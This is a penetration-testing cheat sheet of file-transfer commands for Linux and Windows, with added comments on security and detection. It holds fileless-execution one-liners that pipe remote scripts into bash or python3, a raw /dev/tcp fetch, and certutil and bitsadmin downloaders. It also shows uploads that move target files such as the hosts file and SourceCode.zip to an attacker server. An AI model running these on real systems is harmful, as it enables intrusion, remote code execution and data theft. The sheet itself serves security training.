File Transfers
Sections on miscellaneous, protected, and HTTP(S) file transfers are still to be added.
Linux
Servers
HTTP
Servers that accept file uploads.
# start an upload server over plain HTTP (port 8000 by default); uploads are
# unauthenticated unless an option such as --basic-auth is set
python3 -m uploadserver
# create self-signed cert
# -nodes leaves the private key unencrypted; -out and -keyout both point at
# server.pem, so certificate and key end up in the same file
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
# create and move to webroot (must be different dir from the cert)
# presumably so that server.pem, private key included, is not served to clients
mkdir https && cd https
# start web server using the cert
# NOTE(review): the path assumes server.pem was generated in /root; point it at
# the directory where the openssl command above was actually run
sudo python3 -m uploadserver 443 --server-certificate /root/server.pem
# upload from the target
# --insecure skips certificate verification (needed for a self-signed cert): the
# transfer is encrypted, but the client has no proof of which server it reached
# NOTE(review): both -F fields name file1; -F is repeated to send several files
curl -X POST https://10.10.10.10/upload -F 'files=@file1' -F 'files=@file1' --insecure
# raw TCP listener on port 1337 (-l listen, -v verbose, -n no DNS, -p port);
# whatever arrives is neither encrypted nor authenticated
nc -lvnp 1337
# FTP server on port 21; --write enables write access
# NOTE(review): pyftpdlib appears to serve anonymous logins by default, and FTP
# carries data in cleartext; confirm the defaults for the installed version
sudo python3 -m pyftpdlib --port 21 --write
SMB
# unauthenticated
# NOTE(review): the shared path is /, and the server runs under sudo, so the
# whole filesystem is reachable by anyone who can connect to the SMB port;
# sharing a dedicated directory limits what is exposed
# Recent Windows builds refuse guest (unauthenticated) SMB2/3 logons by default,
# which is when the authenticated variant below is needed
sudo impacket-smbserver share -smb2support /
# authenticated
# test/test is a placeholder credential; the same caveat about sharing / applies
sudo impacket-smbserver share -smb2support / -user test -password test
# on the Windows side: map the share to drive z: without credentials
net use z: \\<IP>\share
# map the share with the credentials configured on the server
# (a password given on the command line is recorded by command-line logging)
net use z: \\<IP>\share /user:test test
# copy the file onto the mapped drive
cp <FILE> z:\
WebDav server
# install libraries
sudo pip install wsgidav cheroot
# start server
# --auth=anonymous turns authentication off, --host=0.0.0.0 listens on every
# interface and --root=/tmp exposes all of /tmp, over unencrypted HTTP
# NOTE(review): a dedicated, empty directory as --root keeps unrelated temp
# files out of the share
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
# from Windows: list the server root (DavWWWRoot is the keyword the Windows
# WebDAV redirector uses for the root; it needs the WebClient service running)
dir \\<IP>\DavWWWRoot
# copy a file to the WebDAV root
copy C:\Windows\Temp\<FILE> \\<IP>\DavWWWRoot\
Downloads
# -O (wget) / -o (curl): name of the local output file
# plain HTTP gives no integrity protection; compare `sha256sum file1` with the
# hash computed on the source host before using the file
wget http://10.10.10.10/file1 -O file1
curl http://10.10.10.10/file1 -o file1
# copy over SSH: encrypted, and authenticated as `user` on the remote host
scp user@172.16.10.10:/tmp/file1 ./file1
Fileless execution.
# the response body is piped straight into the interpreter: nothing is written
# to disk and nothing checks the content before it runs
# Detection: file scanning sees nothing here; the activity is visible in
# process command lines / ancestry (e.g. auditd execve records) and in network logs
curl https://172.16.10.1/script.sh | bash
# -q: quiet mode
# -O: specifies the output, -O-: redirect output to stdout
wget -qO- https://172.16.10.1/script.py | python3
# connect to the target webserver
# (bash's /dev/tcp pseudo-device; file descriptor 3 is opened read/write on the socket)
exec 3<>/dev/tcp/10.10.10.32/80
# HTTP GET request
# NOTE(review): HTTP/1.1 requires a Host header and CRLF line endings, so a
# strict server may answer this request with 400
echo -e "GET /script.sh HTTP/1.1\n\n">&3
# print the response
# (status line and headers are printed along with the body)
cat <&3
Uploads
Windows
Servers
Create an SMB share:
# Create a new share
# NOTE(review): -FullAccess "Everyone" on a whole user profile gives read and
# modify rights at share level to any account that can reach the host (NTFS
# ACLs on the folder still apply); scoping -FullAccess to a single account,
# sharing a dedicated folder and removing the share afterwards with
# Remove-SmbShare keeps the exposure small
> New-SmbShare -Name "shared" -Path "C:\Users\x7331" -FullAccess "Everyone"
Name ScopeName Path Description
---- --------- ---- -----------
shared * C:\Users\x7331
# Confirm the share is up
# (the new share is listed next to the default administrative shares)
> Get-SmbShare
Name ScopeName Path Description
---- --------- ---- -----------
ADMIN$ * C:\Windows Remote Admin
C$ * C:\ Default share
IPC$ * Remote IPC
shared * C:\Users\x7331
Access it from the target via File Explorer at \\10.10.10.10\shared.
# to a Linux WebDav server
# (needs the WebClient service on the Windows host; a server listening on port
# 80 receives the file over unencrypted HTTP)
copy C:\Users\john\Desktop\SourceCode.zip \\10.10.10.10\DavWWWRoot\
Downloads
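# Plain-HTTP downloads carry no integrity protection: check the result with
#   Get-FileHash file1 -Algorithm SHA256   (or: certutil -hashfile file1 SHA256)
# against the hash computed on the source host.
# NOTE(review): in Windows PowerShell 5.1 `wget` and `curl` are aliases of
# Invoke-WebRequest, where -O / -o is ambiguous; the next two lines behave as
# written only with the real binaries (curl.exe ships with Windows 10 1803+)
wget http://10.10.10.10/file1 -O file1
curl http://10.10.10.10/file1 -o file1
Invoke-WebRequest https://10.10.10.10/file1 -OutFile file1
# `n` is the BITS job name; the last argument is the local destination path
# Detection: bitsadmin and certutil fetching from URLs are well-known
# living-off-the-land patterns that EDR products commonly alert on
bitsadmin /transfer n http://10.10.10.10/file1 C:\Temp\file1
certutil.exe -verifyctl -split -f http://10.10.10.10/file1
# file_put_contents() takes (filename, data): write the downloaded bytes to file1
php -r '$file = file_get_contents("https://10.10.10.10/file1"); file_put_contents("file1",$file);'
(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/file1','c:\temp\file1')
# copy over SSH: encrypted, and authenticated as `user` on the remote host
scp user@172.16.10.10:/tmp/file1 c:\temp\file1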
# unauthenticated
# (copy without a destination writes into the current directory)
copy \\10.10.10.10\share\file1
# authenticated
# connect to the share
# the password is passed on the command line, so it is captured by command
# history and process command-line logging; `net use n: /delete` removes the mapping
net use n: \\10.10.10.10\share /user:test test
# transfer
copy n:\file1
Fileless execution:
Uploads
# encode file
# -Encoding Byte is Windows PowerShell 5.1 syntax; PowerShell 6+ uses
# -AsByteStream instead
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'c:\temp\file1' -Encoding Byte))
# upload file
# the base64 text is sent as the raw POST body over unencrypted HTTP; the
# receiving side has to capture and decode it
Invoke-WebRequest -Uri http://10.10.10.10 -Method POST -Body $b64
# FTP upload: first argument is the remote name (ftp-hosts), second the local
# file; FTP sends data and any credentials in cleartext
(New-Object Net.WebClient).UploadFile('ftp://10.10.10.10/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
# copy over SSH: encrypted, and authenticated as `user` on the remote host
scp C:\Temp\file1 user@10.10.10.10:/tmp/file1
Misc
b64
# base64 is an encoding, not encryption: it only makes the bytes safe to copy
# and paste. Confirm the copy by comparing hashes on both ends
# (sha256sum on Linux, Get-FileHash on Windows).
# encode file on Windows
[Convert]::ToBase64String((Get-Content -path "c:\temp\file1" -Encoding byte))
# copy the output and decode it on Linux
# (the string below is abbreviated with "..."; paste the full output)
echo IyBDb3B5...YWxob3N0DQo= | base64 -d > file1
# encode file (-w --> wrap, use 0 to disable line wrapping)
# the trailing echo only adds a newline after the single-line output
cat file1 | base64 -w 0;echo
# decode on PowerShell
# (abbreviated string again; WriteAllBytes overwrites an existing file)
[IO.File]::WriteAllBytes("c:\temp\file1", [Convert]::FromBase64String("LS0tL...0tLQo="))
Linux
# starting an uploadserver
# (plain HTTP; the upload command below targets port 8000 and the /upload path)
python3 -m uploadserver
# uploading a file
# requests is a third-party package and has to be installed on the sending host;
# the multipart field name "files" matches the one used with curl -F elsewhere on this page
python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("file1","rb")})'
# "https://script.sh" in the two Python lines is a placeholder URL
# python2.7
python2.7 -c 'import urllib;urllib.urlretrieve ("https://script.sh", "script.sh")'
# python3
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://script.sh", "script.sh")'
# read the whole response into memory, then write it to script.sh
php -r '$file = file_get_contents("https://10.10.10.10/script.sh"); file_put_contents("script.sh",$file);'
# same download, streamed in 1024-byte chunks (one command; the single-quoted
# string continues across the line break)
php -r 'const BUFFER = 1024; $fremote =
fopen("https://10.10.10.10/script.sh", "rb"); $flocal = fopen("script.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
# prints the fetched lines and pipes them into bash: nothing is saved and the
# content runs unchecked; the leading @ suppresses PHP errors from file()
php -r '$lines = @file("https://10.10.10.10/script.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
# LWP::Simple is not part of core Perl (libwww-perl); https URLs additionally
# need LWP::Protocol::https
perl -e 'use LWP::Simple; getstore("https://10.10.10.10/script.sh", "script.sh");'
ruby -e 'require "net/http"; File.write("script.sh", Net::HTTP.get(URI.parse("https://10.10.10.10/script.sh")))'
Windows
# create a file called `wget.js`
// Download helper for Windows Script Host: argument 0 is the URL to fetch,
// argument 1 the local file to write.
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
// third argument false = synchronous: Send() returns once the response is complete
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
// NOTE(review): the HTTP status is never checked, so an error page would be
// saved as if it were the requested file
BinStream = new ActiveXObject("ADODB.Stream");
// Type 1 = adTypeBinary: the body is written byte for byte, with no text conversion
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
// no save option is passed, so SaveToFile fails if the target file already exists
BinStream.SaveToFile(WScript.Arguments(1));
# execute script
# arguments: source URL, then output file name (WScript.Arguments(0) and (1) in wget.js)
# Detection: cscript.exe making outbound HTTP(S) requests is unusual on most
# hosts and shows up in process command-line and network telemetry
cscript.exe /nologo wget.js https://10.10.10.10/script.ps1 script.ps1
# create a file called `wget.vbs`
' Download helper for Windows Script Host: argument 0 is the URL to fetch,
' argument 1 the local file to write.
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
' third argument False = synchronous request
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
' NOTE(review): the HTTP status is never checked, so an error page would be
' saved as if it were the requested file
with bStrm
' type 1 = adTypeBinary: the body is written byte for byte
.type = 1
.open
.write xHttp.responseBody
' save option 2 = adSaveCreateOverWrite: an existing file is replaced
.savetofile WScript.Arguments.Item(1), 2
end with
# execute script
# arguments: source URL, then output file name (WScript.Arguments.Item(0) and (1) in wget.vbs)
# Detection: cscript.exe making outbound HTTP(S) requests is unusual on most
# hosts and shows up in process command-line and network telemetry
cscript.exe /nologo wget.vbs https://10.10.10.10/script.ps1 script.ps1